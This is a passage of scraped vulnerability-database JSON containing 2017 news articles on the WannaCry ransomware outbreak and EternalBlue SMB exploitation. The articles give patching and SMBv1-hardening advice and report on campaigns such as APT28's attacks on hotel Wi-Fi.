Far\n\n[](<https://2.bp.blogspot.com/--CRkMyWv77U/WRnSBzGBFOI/AAAAAAAAsqU/glEj-9EvHH4XNiyp08QdFAMRkDetWMOpQCLcB/s1600/wannacry-ransomware-cyber-attack.png>)\n\nWe have been covering this story since Friday when this malware was first emerged and hit several hospitals across the globe, eventually forcing them to shut down their entire IT systems over the weekend, hence rejecting patients appointments, and cancel operations. \n \nLater this cyber attack brought down many organizations to their knees. \n \nInstead of repeating same details again, read our previous articles dig deeper and know what has happened so far: \n \n\n\n * **[Day 1: OutCry](<https://thehackernews.com/2017/05/wannacry-ransomware-unlock.html>) **\u2014 WannaCry targeted over 90,000 computers in 99 countries.\n * **[Day 2: The Patch Day](<https://thehackernews.com/2017/05/wannacry-ransomware-windows.html>) **\u2014 A security researcher successfully found a way to slow down the infection rate, and meanwhile, Microsoft releases emergency patch updates for unsupported versions of Windows.\n * **[Day 3: New Variants Arrives](<https://thehackernews.com/2017/05/wannacry-ransomware-cyber-attack.html>) **\u2014 Just yesterday, some new variants of WannaCry, with and without a kill-switch, were detected in the wild would be difficult to stop for at least next few weeks.\n \n\n\n### Isn\u2019t the Cyber Attack Over?\n\n \nAbsolutely not. \n \nThis is just beginning. As I reported yesterday, security researchers have detected some new versions of this ransomware, dubbed **[WannaCry 2.0](<https://thehackernews.com/2017/05/wannacry-ransomware-cyber-attack.html>)**, which couldn\u2019t be stopped by the kill switch. \n \nWhat's even worse is that the new WannaCry variant believed to be created by someone else, and not the hackers behind the first WannaCry ransomware. \n \nIt has been speculated that now other organized cybercriminal gangs, as well as script-kiddies can get motivated by this incident to create and spread similar malicious ransomware. \n \n\n\n### How to Protect Yourself from WannaCry Ransomware?\n\n \nHere are some simple tips you should always follow because most computer viruses make their ways into your systems due to lack of simple security practices: \n \n\n\n#### 1\\. Always Install Security Updates\n\nIf you are using any version of Windows, except Windows 10, with SMB protocol enabled, make sure your computer should always receive updates automatically from the Microsoft, and it\u2019s up-to-date always. \n\n\n#### \n2\\. Patch SMB Vulnerability\n\nSince WannaCry has been exploiting a critical [SMB remote code execution vulnerability](<https://thehackernews.com/2017/04/window-zero-day-patch.html>) (CVE-2017-0148) for which Microsoft has already released a patch ([MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) in the month of March, you are advised to ensure your system has installed those patches. \n \nMoreover, Microsoft has been very generous to its users in this difficult time that the company has even released the SMB patches ([download from here](<https://support.microsoft.com/en-in/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>)) for its unsupported versions of Windows as well, including Windows XP, Vista, 8, Server 2003 and 2008. \n \n**Note:** If you are using Windows 10 Creators Update (1703), you are not vulnerable to SMB vulnerability. \n \n\n\n#### 3\\. Disable SMB\n\nEven if you have installed the patches, you are advised to disable Server Message Block version 1 (SMBv1) protocol, which is enabled by default on Windows, to prevent against WannaCry ransomware attacks. \n \nHere's the list of simple steps you can follow to disable SMBv1: \n\n\n 1. Go to Windows' Control Panel and open 'Programs.'\n 2. Open 'Features' under Programs and click 'Turn Windows Features on and off.'\n 3. Now, scroll down to find 'SMB 1.0/CIFS File Sharing Support' and uncheck it.\n 4. Then click OK, close the control Panel and restart the computer.\n\n \n\n\n#### 4\\. Enable Firewall &amp; Block SMB Ports\n\nAlways keep your firewall enabled, and if you need to keep SMBv1 enabled, then just modify your firewall configurations to block access to SMB ports over the Internet. The protocol operates on TCP ports 137, 139, and 445, and over UDP ports 137 and 138. \n \n\n\n#### 5\\. Use an Antivirus Program\n\nAn evergreen solution to prevent against most threats is to use a good antivirus software from a reputable vendor and always keep it up-to-date. \n \nAlmost all antivirus vendors have already added detection capability to block WannaCry, as well as to prevent the secret installations from malicious applications in the background. \n \n\n\n#### 6\\. Be Suspicious of Emails, Websites, and Apps\n\nUnlike WannaCry, most ransomware spread through phishing emails, malicious adverts on websites, and third-party apps and programs. \n \nSo, you should always exercise caution when opening uninvited documents sent over an email and clicking on links inside those documents unless verifying the source to safeguard against such ransomware infection. \n \nAlso, never download any app from third-party sources, and read reviews even before installing apps from official stores. \n \n\n\n#### 7\\. Regular Backup your Files:\n\nTo always have a tight grip on all your important documents and files, keep a good backup routine in place that makes their copies to an external storage device which is not always connected to your computer. \n \nThat way, if any ransomware infects you, it can not encrypt your backups. \n \n\n\n#### 8\\. Keep Your Knowledge Up-to-Date\n\nThere's not a single day that goes without any report on cyber attacks and vulnerabilities in popular software and services, such as Android, iOS, Windows, Linux and Mac Computers as well. \n \nSo, it\u2019s high time for users of any domain to follow day-to-day happening of the cyber world, which would not only help them to keep their knowledge up-to-date, but also prevent against even sophisticated cyber attacks. \n \n\n\n### What to do if WannaCry infects you?\n\n \nWell, nothing. \n \nIf WannaCry ransomware has infected you, you can\u2019t decrypt your files until you pay a ransom money to the hackers and get a secret key to unlock your file. \n \n\n\n#### Never Pay the Ransom:\n\nIt\u2019s up to the affected organizations and individuals to decide whether or not to pay the ransom, depending upon the importance of their files locked by the ransomware. \n \nBut before making any final decision, just keep in mind: there's no guarantee that even after paying the ransom, you would regain control of your files. \n \nMoreover, paying ransom also encourages cyber criminals to come up with similar threats and extort money from the larger audience. \n \nSo, sure shot advice to all users is \u2014 Don't Pay the Ransom. \n \n\n\n### Who's Behind WannaCry &amp; Why Would Someone Do This?\n\n \n**Update: Also Read \u2014** [Google Researcher Finds Link Between WannaCry Attacks and North Korea](<https://thehackernews.com/2017/05/wannacry-lazarus-north-korea.html>). \n \nWhile it's still not known who is behind WannaCry, such large-scale cyber attacks are often propagated by nation states, but this ongoing attack does not bear any link to foreign governments. \n\n\n> \"The recent attack is at an unprecedented level and will require a complex international investigation to identify the culprits,\" said Europol, Europe's police agency.\n\nWhy are they hijacking hundreds of thousands of computers around the globe? Simple \u2014 to extort money by blackmailing infected users. \n\n\n[](<https://4.bp.blogspot.com/-cFyPrIlC1x0/WRnkPC28dKI/AAAAAAAAsqg/k_DozZeVaicpcMfeG57WG0CPgLlUcnvDwCLcB/s1600/bitcoin.png>)\n\nBy looking at the infection rate, it seems like the criminals responsible for this absurd attack would have made lots and lots of dollars so far, but surprisingly they have made relatively little in the way of profits, according to [@actual_ransom](<https://twitter.com/actual_ransom>), a Twitter account that\u2019s tweeting details of every single transaction. \n \nAt the time of writing, the WannaCry attackers have received 171 payments totaling 27.96968763 BTC ($47,510.71 USD). \n \n\n\n### Who is responsible for WannaCry Attack?\n\n \n\u2014 Is it Microsoft who created an operating system with so many vulnerabilities? \n \n\u2014 Or is it the NSA, the intelligence agency of the United States, who found this critical SMB vulnerability and indirectly, facilitates WannaCry like attacks by not disclosing it to Microsoft? \n \n\u2014 Or is it the Shadow Brokers, the hacking group, who managed to hack the NSA servers, but instead of reporting it to Microsoft, they decided to dump hacking tools and zero-day exploits in public? \n \n\u2014 Or is it the Windows users themselves, who did not install the patches on their systems or are still using an unsupported version of Windows? \n \nI do not know who can be blamed for this attack, but according to me, all of them shares equal responsibility. \n \n\n\n### Microsoft Blames NSA/CIA for WannaCry Cyber Attack\n\n \nMicrosoft has hit out at the US government for facilitating cyber attacks, like WannaCry, by not disclosing the software vulnerabilities to the respective vendors and holding them for their benefits, like global cyber espionage. \n \nIn a blog post on Sunday, Microsoft President Brad Smith [condemned](<https://blogs.microsoft.com/on-the-issues/2017/05/14/need-urgent-collective-action-keep-people-safe-online-lessons-last-weeks-cyberattack/>) the US intelligence agencies\u2019 unethical practices, saying that the \"widespread damage\" caused by WannaCry happened due to the NSA, CIA and other intelligence agencies for holding zero-days and allowing them to be stolen by hackers. \n\n\n> \"This is an emerging pattern in 2017. We have seen vulnerabilities stored by the CIA show up on WikiLeaks, and now this vulnerability stolen from the NSA has affected customers around the world,\" Smith said.\n\nThis statement also publicly confirms that the hacking tools and exploits leaked by the Shadow Brokers belong to Equation Group, an elite group of hackers from NSA. \n\n\n> \"Repeatedly, exploits in the hands of governments have leaked into the public domain and caused widespread damage,\" Smith wrote.\n\n \n\n\n### You Should Thank These Experts\n\n \nWhen the outbreak of WannaCry ransomware started on Friday night, It had already infected at least 30,000 computers worldwide, and at that moment nobody had an idea what\u2019s happening and how the ransomware can spread itself like a worm so quickly. \n \nSince then, in last three days, some cybersecurity experts and companies are continuously working hard, day and night, to analyze malware samples to find every possible way to stop this massive attack. \n \n\n\n[Thanks for Your Hard Work \ud83d\ude0d @MalwareTechBlog @msuiche @craiu @gentilkiwi @x0rz to Kill the WannaCry.](<https://www.blogger.com/Thanks+for+Your+Hard+Work+%F0%9F%98%8D+%40MalwareTechBlog+%40msuiche+%40craiu+%40gentilkiwi+%40x0rz+to+Kill+%23WannaCry+http%3A%2F%2Fthehackernews.com%2F2017%2F05%2Fhow-to-wannacry-ransomware.html+%40TheHackersNews>) \n\n\n[CLICK TO TWEET__](<https://twitter.com/intent/tweet?text=Thanks+for+Your+Hard+Work+%F0%9F%98%8D+%40MalwareTechBlog+%40msuiche+%40craiu+%40gentilkiwi+%40x0rz+to+Kill+%23WannaCry+http%3A%2F%2Fthehackernews.com%2F2017%2F05%2Fhow-to-wannacry-ransomware.html+%40TheHackersNews>)\n\n \nI have mentioned some of them, who should be thanked for saving millions of computers from getting hacked: \n\n\n * [MalwareTech](<https://twitter.com/MalwareTechBlog/>) \u2014 very skilled 22-years-old malware hunter who first discovered that here\u2019s a kill-switch, which if used could stop ongoing ransomware attack.\n * [Matthieu Suiche](<https://twitter.com/msuiche>) \u2014 security researcher who discovered the second kill-switch domain in a WannaCry variant and prevent nearly 10,000 computers from getting hacked.\n * [Costin Raiu](<https://twitter.com/craiu/>) \u2014 security researcher from Kaspersky Lab, who first found out that there are more WannaCry variants in the wild, created by different hacking groups, with no kill-switch ability.\nNot only this, [Benjamin Delpy](<https://twitter.com/gentilkiwi/>), [Mohamed Saher](<https://twitter.com/halsten/>), [x0rz](<https://twitter.com/x0rz>), [Malwarebytes](<https://twitter.com/MalwareBytes/>), [MalwareUnicorn](<https://twitter.com/MalwareUnicorn>), and many others. This list of experts is very long, and if I have missed some name, then I'm sorry. \n \nYou can also follow our channel [@TheHackerNews](<https://twitter.com/thehackersnews>), me [@Unix_Root](<https://twitter.com/unix_root>), and our Cybersecurity reporter [@Swati_THN](<https://twitter.com/swati_thn>), on twitter for latest updates. \n \nThank you. Stay tuned.\n", "published": "2017-05-15T05:11:00", "modified": "2017-05-16T08:27:07", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html", "reporter": "Mohit Kumar", "references": [], "cvelist": ["CVE-2017-0148"], "lastseen": "2018-01-27T10:06:40", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 9.3, "modified": "2018-01-27T10:06:40"}}, "objectVersion": "1.4"}, "differentElements": ["description", "modified"], "edition": 1}], "viewCount": 17, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2018-03-15T23:37:17", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2018-03-15T23:37:17", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.thn.ThnBulletin", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "THN:F12E2167FDA829ED32C7A16A83B048BF", "type": "thn", "bulletinFamily": "info", "title": "Cyberspies Are Using Leaked NSA Hacking Tools to Spy On Hotels Guests", "description": "[](<https://4.bp.blogspot.com/-tF29uDwnYZc/WZLNQ7mBHvI/AAAAAAAAuFE/RrauEykBDSMqEn8cYCgp9afp2tpT4QIpACLcBGAs/s1600/hotel-wifi-hacking.png>)\n\nAn infamous Russian-linked cyber-espionage group has been found re-using the same leaked NSA hacking tool that was deployed in the [WannaCry](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) and NotPetya outbreaks\u2014this time to target Wi-Fi networks to spy on hotel guests in several European countries. \n \nSecurity researchers at FireEye have [uncovered](<https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html>) an ongoing campaign that remotely steals credentials from high-value guests using Wi-Fi networks at European hotels and attributed it to the [Fancy Bear](<https://thehackernews.com/2016/11/windows-zeroday-exploit.html>) hacking group. \n \n**Fancy Bear**\u2014also known as APT28, Sofacy, Sednit, and Pawn Storm\u2014has been operating since at least 2007 and also been accused of [hacking the Democratic National Committee](<https://thehackernews.com/2016/07/hillary-clinton-hacked.html>) (DNC) and Clinton Campaign in an attempt to influence the U.S. presidential election. \n \nThe newly-discovered campaign is also exploiting the Windows SMB exploit (CVE-2017-0143), called **[EternalBlue](<https://thehackernews.com/2017/04/swift-banking-hacking-tool.html>)**, which was one of many exploits allegedly used by the NSA for surveillance and leaked by the Shadow Brokers in April. \n \nEternalBlue is a security vulnerability which leverages a version of Windows' Server Message Block (SMB) version 1 networking protocol to laterally spread across networks and also allowed the WannaCry and Petya ransomware to spread across the world quickly. \n \nSince the EternalBlue code is available for anyone to use, cyber criminals are widely trying to use the exploit to make their malware more powerful. \n \nJust last week, a new version of credential stealing [TrickBot banking Trojan](<https://thehackernews.com/2017/08/trickbot-banking-trojan.html>) was found leveraging SMB to spread locally across networks, though the trojan was not leveraging EternalBlue at that time. \n \nHowever, researchers have now found someone deploying the exploit to upgrade their attack. \n\n\n> \"To spread through the hospitality company's network, APT28 used a version of the EternalBlue SMB exploit,\" FireEye researchers write. \"This is the first time we have seen APT28 incorporate this exploit into their intrusions.\"\n\nResearchers have seen ongoing attacks targeting a number of companies in the hospitality sector, including hotels in at least seven countries in Europe and one Middle Eastern country. \n \n\n\n### Here's How the Attack is Carried Out\n\n \nThe attacks began with a spear phishing email sent to one of the hotel employees. The email contains a malicious document named \"Hotel_Reservation_Form.doc,\" which uses macros to decode and deploy GameFish, malware known to be used by [Fancy Bear](<https://thehackernews.com/2017/07/russian-fancy-bear-hacking-group.html>). \n \nOnce installed on the targeted hotel's network,** GameFish** uses the [EternalBlue SMB exploit](<https://thehackernews.com/2017/05/wannacry-ransomware-windows.html>) to laterally spread across the hotel network and find systems that control both guest and internal Wi-Fi networks. \n \nOnce under control, the malware deploys **[Responder](<https://github.com/SpiderLabs/Responder>)**, an open source penetration testing tool created by Laurent Gaffie of SpiderLabs, for NetBIOS Name Service (NBT-NS) poisoning in order to steal credentials sent over the wireless network. \n \nWhile the hacking group carried out the attack against the hotel network, researchers believe that the group could also directly target \"hotel guests of interest\"\u2014generally business and government personnel who travel in a foreign country. \n \nThe researchers revealed one such incident that occurred in 2016 where Fancy Bear accessed the computer and Outlook Web Access (OWA) account of a guest staying at a hotel in Europe, 12 hours after victim connected to the hotel\u2019s Wi-Fi network. \n \nThis is not the only attack that apparently aimed at guests of hotels. South Korea-nexus Fallout Team (also known as [DarkHotel](<https://thehackernews.com/2014/11/darkhotel-apt-malware-targets-global.html>)) has previously carried out such attacks against Asian hotels to steal information from senior executives from large global companies during their business trips. \n \nDuqu 2.0 malware also found targeting the WiFi networks of European hotels used by participants in the Iranian nuclear negotiations. Also, high-profile people visiting Russia and China may have their laptops and other electronic devices accessed. \n \nThe easiest way to protect yourself is to avoid connecting to hotel Wi-Fi networks or any other public or untrusted networks, and instead, use your mobile device hotspot to get access to the Internet.\n", "published": "2017-08-11T04:55:00", "modified": "2017-08-15T10:31:27", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://thehackernews.com/2017/08/hotel-wifi-hacking-tools.html", "reporter": "Swati Khandelwal", "references": [], "cvelist": ["CVE-2017-0143"], "lastseen": "2018-01-27T09:17:57", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2018-01-27T09:17:57", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2018-01-27T09:17:57", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.thn.ThnBulletin", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "type": "thn", "bulletinFamily": "info", "title": "More Hacking Groups Found Exploiting SMB Flaw Weeks Before WannaCry", "description": "[](<https://4.bp.blogspot.com/-10YR4G_L7tQ/WR7pabf4idI/AAAAAAAAswk/1S7J-juAZ8I6dFDAWQti21uL7zJzachdwCLcB/s1600/blackhat-windows-smb-flaw.png>)\n\nSince the Shadow Brokers released the zero-day software vulnerabilities and hacking tools \u2013 allegedly belonged to the NSA's elite hacking team Equation Group \u2013 several [hacking groups and individual hackers](<https://thehackernews.com/2017/04/windows-hacking-tools.html>) have started using them in their own way. \n \nThe April's data dump was believed to be the most damaging release by the Shadow Brokers till the date, as it publicly leaked lots of [Windows hacking tools](<https://thehackernews.com/2017/04/swift-banking-hacking-tool.html>), including dangerous Windows SMB exploit. \n \nAfter the [outbreak of WannaCry](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) last week, security researchers have identified multiple different campaigns exploiting [Windows SMB vulnerability](<https://thehackernews.com/2017/04/window-zero-day-patch.html>) (CVE-2017-0143), called **Eternalblue**, which has already compromised hundreds of thousands of computers worldwide. \n \nI have been even confirmed by multiple sources in hacking and intelligence community that there are lots of groups and individuals who are actively exploiting Eternalblue for different motives. \n \nMoreover, the Eternalblue SMB exploit (_MS17-010_) has now been ported to [Metasploit](<https://www.rapid7.com/db/modules/auxiliary/scanner/smb/smb_ms17_010>), a penetration testing framework that enables researchers as well as hackers to exploit this vulnerability easily. \n \nCybersecurity startup Secdo, an [incident response platform](<https://thehackernews.com/2017/03/secdo-incident-response.html>), has recently [discovered](<http://blog.secdo.com/multiple-groups-exploiting-eternalblue-weeks-before-wannacry>) two separate hacking campaigns using the same Eternalblue SMB exploit at least three weeks before the outbreak of [WannaCry global ransomware attacks](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>). \n \nSo, it would not be surprised to find more hacking groups, state-sponsored attackers, financially motivated organized criminal gangs and gray hat hackers exploiting Eternalblue to target large organizations and individuals. \n\n\n[](<https://2.bp.blogspot.com/-7TYJcbsvly8/WR7jEtochxI/AAAAAAAAswI/HL5yE-ypLrc2SG5QF-XLsVPZmko6VvxWgCLcB/s1600/EternalBlue-windows-smb-exploit.png>)\n\n \nThe two newly discovered hacking campaigns, one traced back to Russia and another to China, are much more advanced than WannaCry, as sophisticated hackers are leveraging Eternalblue to install backdoors, Botnet malware and exfiltrate user credentials. \n \nAccording to [Secdo](<http://blog.secdo.com/multiple-groups-exploiting-eternalblue-weeks-before-wannacry>), these attacks might pose a much bigger risk than WannaCry, because even if companies block WannaCry and patch the SMB Windows flaw, _\"a backdoor may persist and compromised credentials may be used to regain access\"_ to the affected systems. \n \nBoth campaigns are using a similar attack flow, wherein attackers initially infect the target machine with malware via different attack vectors, then uses Eternalblue to infect other devices in the same network and finally inject a stealthy thread inside legitimate applications, which is then used to achieve persistence by either deploying a backdoor or exfiltrating login credentials. \n \n\n\n### Russian Campaign: Credential-Theft Attacks \n\n[](<https://2.bp.blogspot.com/-xtLKSjbZg-o/WR7jVtvAo9I/AAAAAAAAswM/sswg78ncyiA_BdRyfF5-A--ldOarpaE-gCLcB/s1600/ETERNALBLUE-WannaCry.png>)\n\nSecdo discovered that attackers are injecting a malicious thread into the 'lsass.exe' process using Eternalblue. \n \nOnce infected, the thread began downloading multiple malicious modules and then access SQLite DLL to retrieve users' saved login credentials from Mozilla's FireFox browser. \n \nThe stolen credentials are then sent to the attacker's command-and-control server via the encrypted Tor network in order to hide the real location of the C&amp;C server. \n \nOnce sent, a ransomware variant of **CRY128**, which is a member of the infamous Crypton ransomware family, starts running in the memory and encrypts all the documents on the affected system. \n\n\n> According to Secdo, \"at least 5 of the most popular Next Gen AV vendors and Anti-Malware vendors were running on the endpoints and were unable to detect and stop this attack. This is most likely due to the thread only nature of the attack.\"\n\nThis attack has been traced back to late April, that's three weeks prior to the WannaCry outbreak. The attack originates from Russia-based IP address (77.72.84.11), but that doesn't mean the hackers are Russian. \n \n\n\n### Chinese Campaign: Installs Rootkit and DDoS Botnet\n\n[](<https://2.bp.blogspot.com/-eqJx-ApbOg8/WR7jqhg5lFI/AAAAAAAAswQ/F0NR7uhn6oQk5o5wiqUktMR4tqnax16MACLcB/s1600/smb-exploit-blackhat.png>)\n\nThis campaign was also seen in late April. \n \nUsing Eternalblue, a malicious thread is spawned inside of the lsass.exe process, similar to the above-mentioned credential theft attack. \n \nBut only instead of remaining purely in-memory, the initial payload then connects back to a Chinese command-and-control server on port 998 (117.21.191.69) and downloads a known rootkit backdoor, which is based on \u2018Agony rootkit\u2019 to make persistent. \n \nOnce installed, the payload installs a Chinese [Botnet malware](<https://thisissecurity.net/2015/09/30/when-elf-billgates-met-windows/>), equipped with DDoS attack functionality, on the affected machine. \n\n\n> \"These attacks demonstrate that many endpoints may still be compromised despite having installed the latest security patch,\" Secdo concluded. \n\n> \"We highly recommend using a solution that has the ability to record events at the thread level in order to hunt, mitigate and assess potential damage as soon as possible.\"\n\nThese malicious campaigns went unnoticed for weeks because unlike WannaCry, the purpose of these attacks was different, holding affected systems for a long time by achieving persistent and stealing credentials to regain access. \n \nThe recent example is of \"**Adylkuzz**,\" a recently-discovered stealthy[ cryptocurrency-mining malware](<https://thehackernews.com/2017/05/smb-exploit-cryptocurrency-mining.html>) that was also using Windows SMB vulnerability at least two weeks before the outbreak of WannaCry ransomware attacks. \n \nThese attacks are just the beginning, as attacks like WannaCry have not been completely stopped and given the broad impact of the NSA exploits, hackers and cyber criminals are curiously waiting for the [next Shadow Brokers release](<https://thehackernews.com/2017/05/shodow-brokers-wannacry-hacking.html>), which promised to leak more zero-days and exploits from next month. \n \nSince the attackers are currently waiting for new zero-days to exploit, there is very little users can do to protect themselves from the upcoming cyber attacks. \n \nYou can follow some basic security tips that I have mentioned in my previous article about how to disable SMB and prevent your devices from getting hacked.\n", "published": "2017-05-19T01:52:00", "modified": "2017-05-19T15:00:40", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://thehackernews.com/2017/05/eternalblue-smb-exploit.html", "reporter": "Mohit Kumar", "references": [], "cvelist": ["CVE-2017-0143"], "lastseen": "2018-01-27T09:18:01", "history": [], "viewCount": 790, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2018-01-27T09:18:01", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": 